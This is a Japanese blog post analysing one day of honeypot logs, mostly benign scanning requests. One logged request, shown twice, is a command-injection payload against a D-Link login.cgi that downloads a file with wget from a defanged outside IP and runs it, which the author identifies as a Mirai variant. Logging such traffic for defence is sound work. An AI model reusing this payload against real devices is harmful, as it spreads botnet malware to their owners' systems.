S-Owl

S(ecurity)Owl

ハニーポットのログ分析(2018/08/08)

WOWhoneypotの2018/08/08(水) (運用66日目)の簡易分析です。
本日の総アクセス件数は 35件です。以下が全アクセスログです。

28 2018-08-08 GET /
1 2018-08-08 HEAD /
1 2018-08-08 GET /.well-known/security.txt
1 2018-08-08 GET /sitemap.xml
1 2018-08-08 GET /robots.txt
1 2018-08-08 GET /manager/html
1 2018-08-08 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
1 2018-08-08 GET /favicon.ico 

phpMyAdmin関連と/を除外したアクセス数です。

1 2018-08-08 GET /.well-known/security.txt
1 2018-08-08 GET /sitemap.xml
1 2018-08-08 GET /robots.txt
1 2018-08-08 GET /manager/html
1 2018-08-08 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://199.195.254[.]118/dlink%20-O%20-%3E%20/tmp/xd;sh%20/tmp/xd%27$
1 2018-08-08 GET /favicon.ico 

主にサイト構成を調査するようなアクセスのみですね…。
これが本当にハニーポットのログなのかと疑うレベルです…。

 

本日のハンティングログは以下です。Mirai亜種ですね。

1 2018-08-08 wget hxxp://199.195.254[.]118/dlink

以上です。